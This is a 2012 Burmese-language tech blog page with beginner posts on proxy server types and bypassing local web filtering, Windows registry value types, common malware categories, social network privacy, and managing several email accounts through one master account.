Tuesday 25 December 2012

Proxy အၾကာင္းသိေကာင္းစရာ

Proxy Server ဆိုတာ ဘာလဲ
About Proxy Proxy Server ဆိုတာ ဘာလဲ Proxy Server ဆိုတာ သင့္ကြန္ပ်ဴတာနဲ႔ အင္တာနက္ၾကားမွာ တည္ရွိၿပီး အင္တာနက္က သတင္းအခ်က္အလက္ ေတာ္ေတာ္မ်ားမ်ားကို ထိန္းသိမ္းထားပါတယ္။ ကၽြန္ေတာ္တို႔က Website တစ္ခုကို ၾကည့္တဲ့အခါ အရင္ဆံုး Proxy Server ဆီကို request ေရာက္သြားပါတယ္။ Proxy Server က သူ႔ဆီမွာ ကၽြန္ေတာ္တို႔ေတာင္းဆိုတဲ့ Website ရွိရင္ ျပန္ပို႔ေပးလိုက္ပါတယ္။ ဒါေၾကာင့္ အင္တာနက္သံုးစဲြရတဲ့သူအဖို႔ ပိုၿပီးျမန္တဲ့ေကာင္းက်ိဳးကို ခံစားရပါလိမ့္မယ္။ ဒါေပမဲ့ ျမန္မာျပည္က Proxy Server ေတြဟာ အဲဒီလို Cache လုပ္တာထက္ Website Filtering အတြက္ပဲ လုပ္ထားသလားလို႔ေတာင္ ထင္ရပါတယ္။ ဒါ့အျပင္ ျမန္မာျပည္မွာ ရွိတဲ့ တစ္ခ်ိဳ႕ Proxy Server ေတြဟာ မူရင္း Website က Update လုပ္လိုက္တာေတာင္ သူတို႔က Update မလုပ္ႏိုင္ေသးပါဘူး။ Technical အရ ေျပာရရင္ေတာ့ TTL (Time To Live) တန္ဖိုးကို အမ်ားႀကီး ေပးထားတယ္နဲ႔ တူပါတယ္။ Web Filtering လုပ္မထားတဲ့ Proxy Server ေတြ ျမန္မာျပည္မွာ ရွိေပမဲ့ သံုးတဲ့အခါ username နဲ႔ password ေတာင္းတာကို ေတြ႕ရပါတယ္။ (ygncache2.mpt.net.mm ပါ)

Anonymous Proxy Server ဆိုတာဘာလဲ 
Website ေတာ္ေတာ္မ်ားမ်ားဟာ ယံုလို႔မရပါဘူး။ သူတို႔ဟာ ကၽြန္ေတာ္တို႔ရဲ႕ IP ကုိ အသံုးျပဳၿပီး ကၽြန္ေတာ္တို႔ရဲ႕ ကြန္ပ်ဴတာ Hard Disk ထဲက အခ်က္အလက္ေတြကိုေတာင္မွ လွမ္းခိုးႏိုင္ပါတယ္။ အဲဒီလို လုပ္ဖို႔အတြက္ကလည္း အလကားရတဲ့ Hacking program ေလးေတြကို သံုးၿပီး လုပ္ႏိုင္ပါတယ္။ Anonymous Proxy Server ေတြဟာ ကၽြန္ေတာ္တို႔ရဲ႕ IP ကို ေဖ်ာက္ေပးႏိုင္ပါတယ္။ ဒါေၾကာင့္ ကၽြန္ေတာ္တို႔ဟာ အခ်က္အလက္ခိုးယူႏိုင္တဲ့ Website ကို ၾကည့္ရင္ေတာင္မွ ကၽြန္ေတာ္တို႔ရဲ႕ IP ကို အဲဒီ Site ဟာ မသိႏိုင္ပါဘူး။ Anonymous Proxy Server ေတြကပဲ အဲဒီလို user ရဲ႕ IP ကို ေဖ်ာက္ေပးႏိုင္ၿပီး သာမန္ Proxy Server ေတြကေတာ့ ကၽြန္ေတာ္တို႔ရဲ႕ IP ကို target Server ဆီကို ပို႔ေပးေလ့ရွိပါတယ္။
Free Proxy Server ဆိုတာဘာလဲ Free Proxy Server ဆိုတဲ့အတိုင္းပါပဲ။ Free ရတယ္၊ လူတိုင္းသံုးလို႔ရပါတယ္။ ႏိုင္ငံေတာ္ေတာ္မ်ားမ်ားမွာ Free Proxy Server မ်ားစြာရွိေပမဲ့ ေတာ္ေတာ္မ်ားမ်ားဟာေတာ့ Anonymous Proxy Server ေတြ မဟုတ္ၾကပါဘူး။

Proxy Server အမ်ိဳးအစားမ်ား
HTTP Proxy Proxy ဆိုတာ Server သက္သက္ပါပဲ။ ဘာ Proxy လဲဆိုတာ သိမွ ကိုယ့္အတြက္ အသံုး၀င္မွာပါ။ HTTP Proxy ရဲ႕ အကူအညီနဲ႔ Web Pages ေတြ ၾကည့္ႏိုင္မယ္၊ download ဆဲြႏိုင္ပါမယ္။ အခုေနာက္ပိုင္းမွာေတာ့ Program ေတြကလည္း HTTP Proxy ေတြနဲ႔ တဲြအလုပ္လုပ္ႏိုင္ပါၿပီ။ ဥပမာ ICQ လို Chat Program ေတြပါ။

SOCKS Proxy 
သူကေတာ့ ပိုအစြမ္းထက္ပါတယ္။ အင္တာနက္ေပၚမွာရွိတဲ့ ဘယ္ Information ဆိုရင္ ဘယ္လို လဲြႊယူေပးရမယ္ဆိုတာ သိပါတယ္။ အဓိကကေတာ့ TCP/IP Protocol နဲ႔ ေကာင္းေကာင္းႀကီး အလုပ္လုပ္ႏိုင္တာပါ။ ဒါေပမဲ့ SOCKS Proxy ကို သံုးမယ္ဆိုရင္ေတာ့ အဲဒီ Proxy Server ဟာ SOCKS 4 လား SOCKS 5 ဆိုတာ သိဖို႔ လိုပါလိမ့္မယ္။

CGI Proxy  
CGI Proxy ဟာ Browser ကေနပဲတစ္ဆင့္ access လုပ္ႏိုင္တဲ့ Proxy Serve ျဖစ္ပါတယ္။ ကၽြန္ေတာ္တို႔ေတြ သံုးေနၾကတဲ့ ေက်ာ္တဲ့Website ဆိုတာ အဲဒီ CGI Proxy ကိုေျပာတာပါပဲ။
FTP Proxy FTP Proxy ကေတာ့ FTP Server ေတြနဲ႔ တဲြအလုပ္လုပ္ႏိုင္ဖို႔ ျဖစ္ပါတယ္။ CuteFTP လို GetRight တို႔ေတြမွာ FTP Proxy ေတြ ထည့္သံုးလို႔ ရပါတယ္။ ျမန္မာႏိုင္ငံက Proxy ေတြမွာ FTP Proxy ေတြ ရွိေပမဲ့ Public အတြက္ေတာ့ ပိတ္ထားပါတယ္။ ဒါေၾကာင့္ ကၽြန္ေတာ္တို႔ေတြ FTP သံုးခ်င္ရင္ေတာ့ ႏိုင္ငံျခားက FTP Proxy ေတြ လွမ္းသံုးရင္ေတာ့ ရႏိုင္ပါတယ္။ (လက္ေတြ႕ေတာ့ ကၽြန္ေတာ္လည္း မစမ္းဖူးပါ)

Proxy Server သံုးလို႔ ရတဲ့ အက်ိဳးေက်းဇူး 
အဓိကကေတာ့ ကိုယ္ၾကည့္ေနတဲ့ Site, ကိုယ္သံုးေနတဲ့ Mail, ကိုယ္သံုးေနတဲ့ Web Chat ေတြက ကိုယ္ဘယ္ကလဲ ဆိုတာ မသိေတာ့တာပါပဲ။ အဲဒီေတာ့ ကိုယ့္ information အတြက္ လံုၿခံဳမႈရွိပါတယ္။ ျမန္မာျပည္မွာ အဲဒါက ဖန္တီးၿပီးသားပါ။ ကၽြန္ေတာ္တို႔ေတြ ဘယ္ site ပဲၾကည့္ၾကည့္ သူတို႔က ကၽြန္ေတာ္တို႔ IP ကို မသိပါဘူး။ data မခိုးႏိုင္ပါဘူး။ ဒီမွာေတာ့ Proxy ဆိုရင္ ေက်ာ္ဖို႔ပဲလို႔ကို ထင္ေနၾကေတာ့ပါ။ ကၽြန္ေတာ္တို႔ႏိုင္ငံရဲ႕ Proxy က Web Filtering လုပ္ထားတယ္၊ တျခားႏိုင္ငံက Proxy က Web Filter လုပ္မထားဘူး၊ အဲဒီေတာ့ ကၽြန္ေတာ္တို႔က အဲဒီ Proxy ကို သံုးလိုက္ရင္ အလုိလို ေက်ာ္ၿပီးသား ျဖစ္သြားတာပါ။ တျခား Proxy ေတြ သံုးတယ္ဆိုတာကလည္း အရမ္းခက္ခဲတာမဟုတ္ပဲ ကိုယ္သံုးေနတဲ့ Browser ရဲ႕ Option ထဲမွာ Proxy Server ဆိုတဲ့ ေနရာမွာ ကိုယ္သံုးခ်င္တဲ့ Proxy Server ရဲ႕ IP ကို ရိုက္ထည့္လိုက္ရံုနဲ႔ ရပါတယ္။ ဒါေပမဲ့ တျခားႏိုင္ငံက Proxy ကို လွမ္းသံုးဖို႔ဆိုတာ အဲဒီေလာက္ႀကီးထိလည္း မလြယ္ပါဘူး။ (CGI Proxy ေတြကို မဆိုလိုပါ)

ဘယ္လို ျပႆနာေတြ ႀကံဳႏိုင္လဲ ဆိုေတာ့
(၁) ကိုယ့္ေနရာနဲ႔ ကိုယ့္သံုးတဲ့ Proxy နဲ႔ အရမ္းေ၀းေနတဲ့အခါ ေႏွးတာေတြ၊ ခ်ိတ္ဆတ္မရတာေတြ ျဖစ္တတ္ပါတယ္။
(၂) ကိုယ္သံုးတဲ့ Proxy ဟာ ကိုယ္ဟာ ျမန္မာျပည္ကမို႔ သံုးခြင့္မေပးတာမ်ိဳးလည္း ရွိတတ္ပါတယ္။
(၃) တခ်ိဳ႕ Proxy Server ေတြကေတာ့ IP နဲ႔ ကန္႔သတ္ထားတာမ်ိဳးလည္း ရွိပါတယ္။ ကိုယ့္ IP က သူတို႔ list ထဲမွာ မပါရင္ သံုးမရတာမ်ိဳး ျဖစ္ပါတယ္။
(၄) အဓိကကေတာ့ ကၽြန္ေတာ္တို႔ရဲ႕ ISP က ကၽြန္ေတာ္တို႔သံုးမဲ့ Proxy Server ေတြကို Access Denied လုပ္ထားတာလည္း ျဖစ္ေလ့ရွိပါတယ္။ အဲဒါက အမ်ားဆံုးပါ။ source: IT men

အျပည့္အစံု

Virus အေၾကာင္းမ်ား

About Virus Value Value တစ္ခုမွာရွိတဲ႕ Data တစ္ခုကိုေဖာ္ျပတဲ႕ေနရာမွာ Data type အမ်ိဳးအစား (၆)မ်ိဳးအနက္က တစ္ခုခုနဲ႕ေဖာ္ျပႏိုင္ပါတယ္။ အဲ႕ဒီ (၆) မ်ိဳးကေတာ႔
About Virus Value
Value တစ္ခုမွာရွိတဲ႕ Data တစ္ခုကိုေဖာ္ျပတဲ႕ေနရာမွာ Data type အမ်ိဳးအစား (၆)မ်ိဳးအနက္က တစ္ခုခုနဲ႕ေဖာ္ျပႏိုင္ပါတယ္။ အဲ႕ဒီ (၆) မ်ိဳးကေတာ႔ ...........

1.REG_BINARY
Raw Binary Data, Hardware သတင္းေတြကို ကြန္ပ်ဴတာမွ binary အျဖစ္သိမ္းေပမယ္႔၊ Registery editor မွာ အက်ဥ္းျခံဳးရန္ Hexa Decimal နဲ႕ျပေပးတယ္။

2.REG_DWORD
4 byte အရွည္ရွိတဲ႕ ကိန္းဂဏန္းနဲ႕သိမ္း၊ Device Driver မ်ား၊ Service ႏွင္႔သက္ဆိုင္ေသာ
ကန္႔သတ္ခ်က္(parameter) မ်ားကိုေဖာ္ျပေပးတယ္။

3.REG_EXPAND_SZ
ကိန္းရွင္ (variable) မ်ား

4.REG_MULTI_SZ
multiple type, user မ်ားသိႏိုင္ေသာ Char ႏွင္႔ ဂဏန္းမ်ားေရာေႏွာပံု၊ ေနရာလြတ္၊ ေကာ္မာနဲ႕ အျခားအမွတ္ေတြပါ။

5.REG_SZ
စာသားမ်ားပါ၀င္ၿပီး အလ်ားသတ္မွတ္ခ်က္ရွိေသာ အကၡရာစဥ္ကိန္းတန္း တစ္ခု။

6.REG_FULL_RESOCE_DESCRIPTOR
Hardware တစ္ခုကို (Dirver တစ္ခု) Resource List ကိုသိမ္းဆည္းရန္ ဒီဇိုင္းထုတ္ထားေသာ Nested Array တစ္ခုတို႕ပဲ ျဖစ္ပါတယ္။

About Virus (No-1)

ဗိုင္းရပ္စ္ ဆိုသည္မွာ (ပထမပိုင္း)


ဗိုင္းရပ္စ္ဆိုသည္မွာ လို႕ေခါင္းစဥ္တပ္ထားတာ ကၽြန္ေတာ္လဲ သိသေလာက္ေလး ေျပာျပေပးတာပါ။  General Knowledge ေပါ့ဗ်ာ….. ကဲ ဖတ္ေပးဦးဗ်ာ………. အက်ိဳးရွိမွာပါ…
လူေတြေရာ အားလံုးပါပဲ တစ္ခုခုဆို Virus လို႕ပဲ သိပါတယ္။ တကယ္ေတာ့ Virus အႏြယ္၀င္ အမ်ဳိးအစားမ်ားရွိေနပါတယ္။ အဲဒါေတြအေၾကာင္း ရွင္းလင္းျပထားတဲ့ မူလေရးသားသူ ဆရာမ်ဳိးသူရ အားအထူး ေက်းဇူးတင္ရွိပါတယ္။

၁။ Computer Virus
Computer virus ဆိုတာ သူ႕ကိုသူ attach လုပ္ထားတဲ႔ program (သို႕) file တစ္ခုျဖစ္ျပီး ကြန္ပ်ဴတာတစ္ခုကေန တစ္ခုကို ျပန္႔ွႏွ႕ံကူးစက္ႏိုင္ပါတယ္.. လူေတြမွာ Virus ကူးသလိုပဲ ျပန္႕ႏွ႔ံျပီးေတာ့ ကြန္ပ်ဴတာရ႕ဲ System ကိုပံုမွန္အလုပ္ မလုပ္ေအာင္ ေႏွာက္ယွက္မယ္၊ Windows ကို Error ေတြမ်ားလာေအာင္ လုပ္မယ္၊ user data ေတြကို ဖ်က္ဆီးမယ္၊ Hardware ေတြ Software ေတြ အေရးၾကီးတဲ႔ File ေတြကို ဖ်က္ဆီးမယ္... စတာေတြကို လုပ္ေဆာင္ပါတယ္။ ဒါေပမယ့္ Virus အမ်ားစုဟာ executable fileေတြျဖစ္ၾကပါတယ္.. ဥပမာ.. chrome.exe, system.bat , flashy.com စသျဖင့္ေပါ့ .. သူတို႕ဟာ ကြန္ပ်ဴတာထဲမွာ ရွိေနရင္ေတာင္မွ သင္ကိုယ္တုိင္မွ သြားမဖြင့္ရင္/ သြားမ run မိရင္ ကြန္ပ်ဴတာကို ဘာမွ မထိခိုက္နိုင္ပါဘူး... ဒါေၾကာင့္ မွတ္ထားရမွာက လူ၏ လုပ္ေဆာင္ခ်က္မပါ၀င္ပဲ Computer Virus သည္ မပ်ံ႕ႏွံ႕ မကူးစက္နိုင္ပါ။ Virus ပ်ံ႕ႏွံ႕နိုင္တဲ႔ နည္းလမ္းေတြကေတာ့ အမ်ိဳးမ်ိဳးရွိပါတယ္...forward E-mail က attached file ေတြ၊ memory stick(flash/thumb drives) ေတြ၊ Full sharing ကေန virus infected file ထည့္တာေတြ၊ သူငယ္ခ်င္း အခ်င္းခ်င္း မသိပဲနဲ႔ Virus infected file ကို share လုပ္မိတာေတြ .. စသျဖင့္ေပါ့...ဗ်ာ

၂။ Malware

Malware ဆုိတာ အဂၤလိပ္စကား ၂ လံုး Malicious Software ကိုေပါင္းစပ္ျပီး ကြန္ပ်ဴတာ ပညာရွင္ေတြက အလြယ္ေခၚၾကတဲ ့virus လို program ေတြပါပဲ.. အဲဒိ Malware ကကြန္ပ်ဴတာပိုင္ရွင္ရ႕ဲ ခြင့္ျပဳခ်က္မရပဲ ၊ မသိေစပဲ single computer / server / computer network ထဲ ၀င္ျပီး ကြန္ပ်ဴတာ System ပ်က္ဆီးေစနိုင္ေအာင္ ၊ အေႏွာက္အယွက္ျဖစ္ေအာင္ ေရးေလ့ရွိၾကပါတယ္.. Malware တစ္ခုမွာ Computer VIrus , worms, trojan horses, most rootkits, spyware, dishonest adware, crimeware and other malicious and unwanted software ေတြပါ၀င္ေလ့ရွိပါတယ္..

၃။ worm

worm ဆိုတာက virus နဲ႔ ဆင္တူေအာင္ ေရးထားၾကတာပါပဲ။ virus တစ္ခုရဲ႕ Sub-class လို႕လည္း ေခၚလို႕ရပါတယ္။ သူကေတာ့ Virus လို လူကျဖန္႕မွ ပ်ံ႕တာမ်ဴိးမဟုတ္ပဲ သူပါသူ Computer network ထဲမွာရွိတဲ႔ အျခားကြန္ပ်ဴတာေတြကို လူရဲ႕လုပ္ေဆာင္ခ်က္ လံုး၀မပါပဲနဲ႔ ပ်ံ႕ႏွံ႕ေစတာျဖစ္ပါတယ္။ သူ႔ပါသူ ျဖန္႔နိုင္တဲ႔ စြမ္းရည္ရွိတာေပါ့ေနာ္။ အၾကီးမားဆံုး အႏၱရာယ္ကေတာ့ သူက သူ႕ပါသူ System file တစ္ခုလို အေယာင္ေဆာင္ျပီး သူ႕ကိုယ္သူ သန္းေပါင္း ၁၀၀ ေလာက္ copy ပြားနိုင္ပါတယ္။ Hard disk ရဲ႕ used space ကို မ်ားလာေစတယ္..Computer ရဲ႕ System memory usage ေတြ မ်ားလာေစတယ္။ network bandwidth ေတြကိုတက္လာေစတယ္။ Run ထားတဲ႔ program ေတြကို not responding ခဏခဏျဖစ္လာေစတယ္။ လူသိမ်ားတဲ႔ worm ကေတာ့ Blaster worm ပါ။ ထြင္လိုက္တဲ႔လူကေတာ့ ၂၀၀၅ ခုႏွစ္တုန္းက အသက္ ၁၈နွစ္ အရြယ္ Jeffrey Lee Parson ျဖစ္ျပီး ေထာင္ ၁၈ လ က်သြားခဲ႔ပါတယ္။ Blaster worm က windows စတက္တာနဲ႔ Registry ကီး HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Run\windows auto update = msblast.exe မွာ ေနရာယူပါတယ္။ msblast.exe ဆိုတာကေတာ့ နာမည္တူေပးထားတာေပါ့။ Blaster worm က Computer System ထဲမွာ ရွိေနျပီဆိုတာနဲ႔ Cracker ေတြက ကြန္ပ်ဴတာကို Remote လုပ္ျပီး ထိန္းခ်ုဳပ္နိုင္ေအာင္ ေရးထားပါတယ္။
About Virus (No-2)
ဗိုင္းရပ္စ္ဆိုသည္မွာ (ဒုတိယပိုင္း)

၄။ Trojan horse

Trojan horse ကို Trojan လို႔လည္းေခၚပါတယ္။ Trojan ဆိုတဲ႔ ျမင္းရုပ္ၾကီးအေၾကာင္း ငယ္ငယ္က ကမာၻ႔သမိုင္းမွာသင္ဖူးၾကမွာေပါ့။ Tri ဇာတ္ကားလည္း ၾကည့္ဖူးၾကမွာပါ။ အဲဒိထဲကလိုပဲ အလုပ္လုပ္တယ္လို႕ေျပာလို႕ရပါတယ္။ ပံုမွန္အားျဖင့္ အသံုး၀င္တဲ႔ Software ေတြမွာ ထည့္ထားတတ္ၾကပါတယ္။ ဥပမာေပါ့ဗ်ာ... Game တစ္ခုကို Install ျပီးေဆာ့ေနေပမယ့္ အျခားတစ္ဖက္မွာ Hacker ေတြ Cracker ေတြက ကြန္ပ်ဴတာထဲကို ၀င္ေမႊေနလို႕ရေအာင္လုပ္ေပးေနတယ္။ အဲဒီေတာ့ အဲဒိ Game ကို Trojan horse လို႕ေခၚတာေပါ့။ တစ္ကယ္ေတာ့ Game က တရား၀င္ထုတ္ထားတဲ႔ Game ပဲ.. ဒါေပမယ့္ Virus infected ျဖစ္ေနတဲ႔ Game လို႕ေျပာရလိုျဖစ္ေနတာေပါ့။ နမူနာ Trojan Horse ကေတာ့ waterfalls.scr ဆိုတဲ႕ free waterfall screen saver ပဲျဖစ္ပါတယ္။
Trojan horse တစ္ခုဟာ ေအာက္ပါအခ်က္မ်ားကို လုပ္ေဆာင္ေပးနိုင္ပါတယ္...
* Remote Access
* Data Destruction
* Downloader/dropper
* Server Trojan(Proxy, FTP , IRC, Email, HTTP/HTTPS, etc.)
* Disable security software
* Denial-of-service attack (DoS)

၅။ Spyware
သူကေတာ့ သူခိုးေပါ့ေနာ္.. Spy ေတြ ဘယ္လို အလုပ္လုပ္သလဲဆိုတာ သိၾကမွာပါ။ သူက ကြန္ပ်ဴတာကို ထိခိုက္ဖ်က္ဆီးခ်င္မွ ဖ်က္ဆီးမယ္  ဒါေပမယ့္ ကြန္ပ်ဴတာမွာသံုးေနတဲ႔ user ရ႕ဲ အမ်ိဳးမ်ိဳးေသာ အခ်က္အလက္ေတြ၊ အေရးၾကီးတဲ႔ Data ေတြကို သူ႕ရ႕ဲ Main server တစ္ခုခုကို ေန႔စဥ္ သတင္းပို႕ေပးေနတယ္။ Spyware ေတြက မ်ားေသာ အားျဖင့္ Web browser ေတြကေန ၀င္နိုင္ပါတယ္။ ျပီးရင္ သူက Browser home page ကိုေျပာင္းထားတတ္ပါတယ္။ သင့္ကို Error message ေတြ အမ်ိဳးမ်ိဳးျပမယ္..(ဥပမာ- သင့္ကြန္ပ်ဴတာမွာ problems ေတြမ်ားေနျပီ..အဲဒါေတြျပင္ခ်င္ရင္ ေအာက္ကခလုတ္ကို ႏွိပ္ပါ) စသျဖင့္ ဆြဲေဆာင္မယ္၊ သင္က link တစ္ခုကို click လိုက္ေပမယ့္ သင္မဖြင့္ပဲနဲ႔ အျခား Porn Site ေတြ အလိုလိုပြင့္လာမယ္ စသျဖင့္ေပါ့ဗ်ာ။ တစ္ခ်ိဳ႕ လူေတြက http cookie ေတြကို Spyware ေတြလို႕ ထင္ၾကပါတယ္။ တကယ္ေတာ့ မဟုတ္ပါဘူး ဒါေပမယ့္ အဲဒိ cookie ထဲမွာ Spyware က track လုပ္နိုင္တဲ႔ Data ေတြ ပါလာတတ္တာေၾကာင္ ့ Spyware Remover ေတာ္ေတာ္မ်ားမ်ားက Cookie ေတြကို ဖ်က္ပစ္ၾကတာပါ။ Spyware ကို ကာကြယ္ခ်င္ရင္ေတာ့ pop-ups က်လာတဲ႔ link ေတြကို ေရွာင္တာေကာင္းပါတယ္... Free Spyware Remover ေတြနဲ႔လည္း ကာကြယ္နိုင္ပါတယ္။

၆။ Adware
Adware ဆုိတာကေတာ့ Advertising-supported software (သို႔) software package တစ္ခုျဖစ္ပါတယ္။ သူကေတာ့ Screen မွာ Automatic ေပၚလာေအာင္ ဖန္တီးထားျပီး Download အတင္းလုပ္ခိုင္းပါတယ္။ အခ်ိဳ႕ေသာ Adware မ်ားဟာ Spyware မ်ားျဖစ္တတ္ၾကပါတယ္။

၇။ Crimeware
Crimeware ဆိုတာကေတာ့ Spyware, Adware, Malware အမ်ိဳးအစားေတြထဲမွာပါပါတယ္။ သူ႕ရဲ႕ရည္ရြယ္ခ်က္ကေတာ့ financial crime ေတြအတြက္ ရည္ရြယ္ျပီး ေရးၾကတာမ်ားပါတယ္။ သူက user password ေတြ၊ links ေတြ၊ အခ်က္အလက္ေတြကို မွတ္သားထားႏိုင္ျပီး သူ႔ကို Run ထားတဲ႔လူက ျပန္ဖြင့္ၾကည့္ျပီး user data ေတြကို ခိုးယူနိုင္တာေပါ့။ ဥပမာေျပာရရင္
ခုေခတ္စားေနတဲ႔ key logger တို႔ keystroke logging software တို႕ဟာ Crimeware အမ်ိဳးအစားေတြပဲျဖစ္ပါတယ္။
Source; http://bonemyathein.blogspot.com/p/virus.html























































 

အျပည့္အစံု

Social Network ဆုိတာဘာလဲ

Web 2.0 ေခၚ Social Network ဆိုတာဟာ လူတိုင္းနီးပါး၊ လူငယ္တိုင္းလိုလို ၾကားေနရတဲ့ ေခတ္ေပၚ အေခၚအေ၀ၚတစ္ခုပါ။
အင္တာနက္ေပၚမွာ လူအမ်ားႏွင့္ ခ်ိတ္လို႔ရတဲ့ ေနရာေပါ့။ မိုဘိုင္းလ္ဖုန္းႏွင့္လည္း သံုးလို႔ရတယ္။ နည္းပညာ တစ္ေခတ္စမ္းထမႈေပါ့။ ၀ါသနာတူရာ စိတ္၀င္စားတဲ့ နယ္ပယ္အလိုက္ကို မိတ္ေဆြဖြဲ႕ၿပီး ဆံုဆည္းရာ ရပ္၀န္းနယ္ပယ္ တစ္ခုလို႔ေျပာရင္လည္း မွားမယ္မထင္ပါဘူး။

Freedom is not free လို႔ေျပာၾကတာ ရွိသလို free ရတိုင္းလည္း တကယ္ေတာ့ free မျဖစ္ဘူး။ တကယ့္ေလာကမွာ free ဆိုတာ မရွိပါဘူး။ အေပးအယူေတြခ်ည္းပါဘဲ။

Social Network Site ေတြမွာ အဖြဲ႕၀င္လုပ္လိုက္တာႏွင့္ ကိုယ့္ရဲ႕အခ်က္အလက္ေတြဟာ အဲဒီ၀က္ဆိုက္ပိုင္ရွင္ ဆီကို ေရာက္သြားၿပီ။ သူႀကိဳက္သလို စီမံႏိုင္ခြင့္ကို သေဘာတူလို႔ free သံုးလို႔ရတာေပါ့။ အခုေနာက္ပိုင္း account အသစ္ေတြေတာင္မွ သတ္သတ္လုပ္စရာ မလိုေတာ့ဘဲ ကိုယ့္ရဲ႕ email ID ႏွင့္ password ကိုပဲ သံုးၿပီး ၀င္လို႔ရတဲ့ social site ေတြ အမ်ားႀကီးရွိလာပါၿပီ။

Campaign လုပ္တာျဖစ္ျဖစ္ အမ်ားသိေအာင္ျဖန္႔ရမယ့္ သတင္းေတြကို ျဖန္႔ခ်င္တဲ့အခါမွာ ကိုယ့္ email ထဲကို၀င္ၿပီး ကိုယ္တုိင္စာပို႔စရာ မလိုေတာ့ဘူး။ Social Site ေတြကေန form ေလးလုပ္ေပးထားတာေလးကို ၿဖည့္ၿပီးေတာ့ အဲဒီမွာ ကိုယ့္နာမည္၊ email ID ႏွင့္ email password ကို ထည့္လိုက္တာႏွင့္ ကိုယ့္ရဲ႕ email ထဲက contact မွာ ရွိရွိသမွ်သူေတြဆီကို ကိုယ့္ email ကိုယ့္ နာမည္ႏွင့္ စာပို႔ေပးပါတယ္။

Website ေတြ blog ေတြ social site ေတြ အမ်ားႀကီးကို ဘာျဖစ္လို႔ free ျဖစ္ေနတာလည္းဆိုတာ စိတ္၀င္စားစရာေကာင္းပါတယ္။

Social site ျဖစ္ျဖစ္ free ရတာေတြေရာ ၀ယ္ရတာေတြေရာ သံုးတဲ့အခါတုိင္း agreement (သေဘာတူခ်က္) ကို သေဘာတူေၾကာင္း ႏွိပ္ၿပီးမွသာ သံုးခြင့္ရတာပါ။ ဒါေပမယ့္ ေတာ္ေတာ္မ်ားမ်ားကေတာ့ အဲဒီထဲမွာ ဘာေတြပါတယ္ဆိုတာ မဖတ္ၾကဘူး။ ဖတ္လည္း နားမလည္းဘူးေပါ့။

အဲဒီ free ၀န္ေဆာင္မႈ ေပးတဲ့သူေတြမွာလည္း ႀကီးႀကီးမားမား ကုန္က်စရိတ္ေတြရွိပါတယ္။ အဲတာေတြအတြက္ ၀င္ေငြျပန္ရေအာင္ လုပ္ရပါတယ္။ အဲတာကို user ေတြက သေဘာတူလို႔ free သံုးခြင့္ရတာပါ။

Social Network Site ေတြဟာ ထုတ္လုပ္သူ လုပ္ငန္းရွင္ေတြအတြက္သူတို႔ ေရာင္းကုန္ကို ေႀကာ္ျငာဖို႔ ပစ္မွတ္ျဖစ္လာသလို ေႀကာ္ျငာလုပ္ငန္းရွင္ေတြ အတြက္လည္း ပစ္မွတ္ ျဖစ္လာတယ္။ ၾကားခံေႀကာ္ျငာႏွင့္ ၀င္ေငြရွာတဲ့ သူေတြအတြက္လည္း အဓိက ၀င္ေငြရတဲ့ ေနရာဟာ Social Network Site ေတြလို free ၀န္ေဆာင္မႈေပးတဲ့ site ေတြပါဘဲ။

အဲဒီ၀က္ဆိုက္ေတြကို ၀င္လိုက္တာႏွင့္ ကိုယ့္ email အပါအ၀င္ username ႏွင့္ password ေတြကိုပါ ေပးလိုက္ရတာပါ။ ကိုယ္သံုးေနတဲ့ ၀န္ေဆာင္မႈကို ေပးတဲ့ဆုိက္ေတြက သူတို႔ေၾကာ္ျငာစရာရွိရင္ ကိုယ့္ email ႏွင့္ ကိုယ့္ contact အားလံုးဆီကို ပို႔လိုက္လို႔ရတယ္။ ကိုယ့္အခ်က္အလက္ေတြ သူမ်ားကို ျပန္ေရာင္းလို႔လည္း ရေသးတယ္။

အင္တာနက္ေပၚမွာ အားတုိင္း ကေလ့ခ်င္တဲ့ သူေတြ သတိထားစရာပါ။ ကိုယ့္ရဲ႕ privacy ႏွင့္ လံုၿခံဳမႈကို တန္ဖိုးထားခ်င္ရင္ေတာ့ သတိထား သံုးရမွာ ျဖစ္ပါတယ္။ တကယ္လို႔ သံုးေတာ့မယ္ဆိုရင္လည္း email ID သီးသန္႔ေတြႏွင့္ အသံုးျပဳသင့္ပါတယ္။ username ႏွင့္ password ေတြလည္း တစ္ျခားဟာေတြႏွင့္ မတူေအာင္ သံုးသင့္ပါတယ္။ ကိုယ္ေရး အခ်က္အလက္ေတြကိုလည္း ကိုယ္မွတ္မိေနမယ့္ အမွားေတြသာ ေပးသင့္တယ္။

Email ID အမ်ားႀကီးသံုးသူေတြအတြက္ account တစ္ခုထဲကေနတျခား email ေတြ ဘယ္လိုၾကည့္လို႔ရတယ္ ဆိုတာ ဒီေဆာင္းပါး (Master Email account ဘယ္လိုသံုးမလဲ) မွာ ဖတ္ႏုိင္ပါတယ္။ (burmait.net မွ ကူးယူေဖာ္ျပပါသည္။)

အျပည့္အစံု

Master Email account ဘယ္လိုသံုးမလဲ

ဒီလို email ကို ဆိုင္ရာဆိုင္ရာအတြက္ (Email လံုျခံဳေရး ဘယ္လိုလုပ္မလဲ ေဆာင္းပါးကို ဖတ္ႏိုင္ပါတယ္) သံုးဖို႔ account ေတြ အမ်ားႀကီး လုပ္ထားေတာ့ အင္တာနက္ဆိုင္ေတြမွာ email check တဲ့ အခါမွာ
အခ်ိန္ေတြ အမ်ားႀကီးကုန္ႏိုင္ပါတယ္။ တစ္ခု၀င္လိုက္ ဖတ္လိုက္ ထြက္လိုက္ႏွင့္ေပါ့။ ဒီလို မျဖစ္ရေလေအာင္ master email account တစ္ခု ထားၿပီးေတာ့ တစ္ေနရာထဲကေန ကိုယ့္ရဲ႕ email account ေတြ အားလုံးကို ဖတ္တာ၊ စာျပန္ေရးတာ ျဖစ္ျဖစ္ လုပ္ႏိုင္ပါတယ္။

ကိုယ့္ရဲ႕ Master email account ထဲကေန Mail Setting/Accounts and Import/Check mail using POP3/Add POP3 Email Account ကေန ကိုယ္ၾကည့္ခ်င္တဲ့ email ID တစ္ခုခ်င္း ထည့္ရပါမယ္။ အဲဒီမွာ username ရယ္ password ရယ္ ထည့္ၿပီး Always use SSL ရယ္ Lable incoming message ရယ္ Archive incoming message ရယ္ကို ေရြးခ်င္ရင္ ေရြးလို႔ရတယ္။ တစ္ျခား web browser ကေနၿပီးေတာ့ ဒီ Master account မွာ ထည့္မယ့္ email ID (slave acccount) ထဲကို၀င္ၿပီးေတာ့ mail setting/forwarding and POP/IMAP ေအာက္က POP download မွာ enable ဆိုတဲ့ 